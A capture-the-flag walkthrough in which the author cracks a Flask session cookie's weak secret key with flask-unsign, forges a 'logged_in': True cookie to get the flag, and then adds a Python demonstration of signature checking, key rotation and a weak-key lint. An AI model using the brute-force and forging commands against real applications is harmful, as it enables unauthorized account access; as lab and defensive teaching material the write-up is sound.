
Target IP/URL : http://35.242.223.46:31318/
When we visit the site, we find that it doesn’t let us access the content. So first we perform the usual steps, such as viewing the page source.

We didn’t find any data that might help us, so we’ll use Burp Suite to intercept the request.

As we can see here, the session cookie is encrypted. From a first glance at the shape of the encoded value, we conclude that it is a JWT (JSON Web Token).
We will use one of the online sites to decode the JWT; I will use https://jwt.io/.

The result:
{
"logged_in": false
}
Now we need to change the value from false to true, but it’s not that easy 😎😈
We need to install the tool “flask-unsign”, which is used to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. To include the standalone wordlist component, install it with this command:
pip3 install flask-unsign[wordlist]
flask-unsign -u -c "eyJsb2dnZWRfaW4iOmZhbHNlfQ.aBIZQA.5J4pdo1hUYG_LasSvLo1E-pT7RQ"
[*] Session decodes to: {'logged_in': False}
[*] No wordlist selected, falling back to default wordlist..
[*] Starting brute-forcer with 8 threads..
[*] Attempted (2176): -----BEGIN PRIVATE KEY-----ECR
[+] Found secret key after 19840 attemptsVtRazrRfDmHP
'password'
We found the secret key. Now we change the value and re-encrypt (sign) the cookie with the same key using this command:

flask-unsign -s -c "{'logged_in': True}" --secret "password"
eyJsb2dnZWRfaW4iOnRydWV9.aBIdiA.bD0hNRvI0LVqfJeliuqwR7B0UWE
Now we replace the cookie in the intercepted Burp Suite request with the one we just signed and see the result.
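To make clear why the steps above work, and what the application owner should have done differently, here is an added Python example (written for this walkthrough, not code from the challenge or from flask-unsign). The first function reads the payload and timestamp of the cookie shown above without any key, which illustrates that a Flask session cookie is signed rather than encrypted: anyone holding it can read "logged_in": false. The rest is a simplified signed-cookie scheme in the same payload.timestamp.signature layout (assumption: HMAC-SHA256 with a hypothetical salt; it is not byte-compatible with Flask's itsdangerous format), used to show that a cookie signed under a guessable key like "password" is rejected as soon as the server rotates to a key generated with secrets.token_bytes, together with a small lint that flags weak SECRET_KEY values.

```python
import base64
import hashlib
import hmac
import json
import math
import secrets
import time
import zlib
from collections import Counter
from typing import Optional, Tuple

# Sample input taken from the walkthrough above (the unprivileged cookie).
SAMPLE_COOKIE = "eyJsb2dnZWRfaW4iOmZhbHNlfQ.aBIZQA.5J4pdo1hUYG_LasSvLo1E-pT7RQ"

# Hypothetical salt for the simplified signer below (not Flask's real value).
SALT = b"demo-cookie-session"


def _b64decode(s: str) -> bytes:
    # Flask strips '=' padding from each segment; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def decode_session(cookie: str) -> Tuple[dict, int]:
    """Read payload and timestamp of a Flask session cookie WITHOUT checking the
    signature. A leading '.' marks a zlib-compressed payload."""
    compressed = cookie.startswith(".")
    if compressed:
        cookie = cookie[1:]
    payload_b64, ts_b64, _sig_b64 = cookie.split(".")
    raw = _b64decode(payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    timestamp = int.from_bytes(_b64decode(ts_b64), "big")
    return json.loads(raw), timestamp


def sign_session(payload: dict, secret: bytes, timestamp: Optional[int] = None) -> str:
    """Simplified timestamped HMAC cookie: payload.timestamp.signature."""
    ts = int(time.time()) if timestamp is None else timestamp
    body = _b64encode(json.dumps(payload, separators=(",", ":"), sort_keys=True).encode())
    body += "." + _b64encode(ts.to_bytes(4, "big"))
    sig = hmac.new(secret, SALT + body.encode(), hashlib.sha256).digest()
    return body + "." + _b64encode(sig)


def verify_session(cookie: str, secret: bytes, max_age: Optional[int] = None) -> Optional[dict]:
    """Return the payload only if the signature (and optional age limit) checks out."""
    try:
        payload_b64, ts_b64, sig_b64 = cookie.split(".")
    except ValueError:
        return None
    body = f"{payload_b64}.{ts_b64}"
    expected = hmac.new(secret, SALT + body.encode(), hashlib.sha256).digest()
    # Constant-time comparison so the check does not leak timing information.
    if not hmac.compare_digest(expected, _b64decode(sig_b64)):
        return None
    ts = int.from_bytes(_b64decode(ts_b64), "big")
    if max_age is not None and time.time() - ts > max_age:
        return None
    return json.loads(_b64decode(payload_b64))


def secret_is_weak(secret: bytes, min_len: int = 32, min_bits_per_byte: float = 3.5) -> bool:
    """Heuristic SECRET_KEY lint: reject short keys and keys with low byte entropy.
    A wordlist entry like b"password" fails on length alone."""
    if len(secret) < min_len:
        return True
    n = len(secret)
    entropy = -sum(c / n * math.log2(c / n) for c in Counter(secret).values())
    return entropy < min_bits_per_byte


def generate_secret() -> bytes:
    """What the application should use: 32 random bytes from the OS CSPRNG."""
    return secrets.token_bytes(32)


if __name__ == "__main__":
    print("readable without any key:", decode_session(SAMPLE_COOKIE))
    strong = generate_secret()
    forged = sign_session({"logged_in": True}, b"password")  # signed with the guessed key
    print("forged cookie accepted under the weak key:", verify_session(forged, b"password"))
    print("forged cookie accepted after key rotation:", verify_session(forged, strong))
    print("is 'password' weak:", secret_is_weak(b"password"), "is the new key weak:", secret_is_weak(strong))
```

The lesson for the defender is the one the brute-force step exposes: the only thing standing between a client and an arbitrary session is the entropy of SECRET_KEY, so it must come from a CSPRNG (or a secrets manager), never from a word a default wordlist contains, and rotating it immediately invalidates every cookie signed under the old value.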

Alright, we got the flag 😎😎💀
Thanks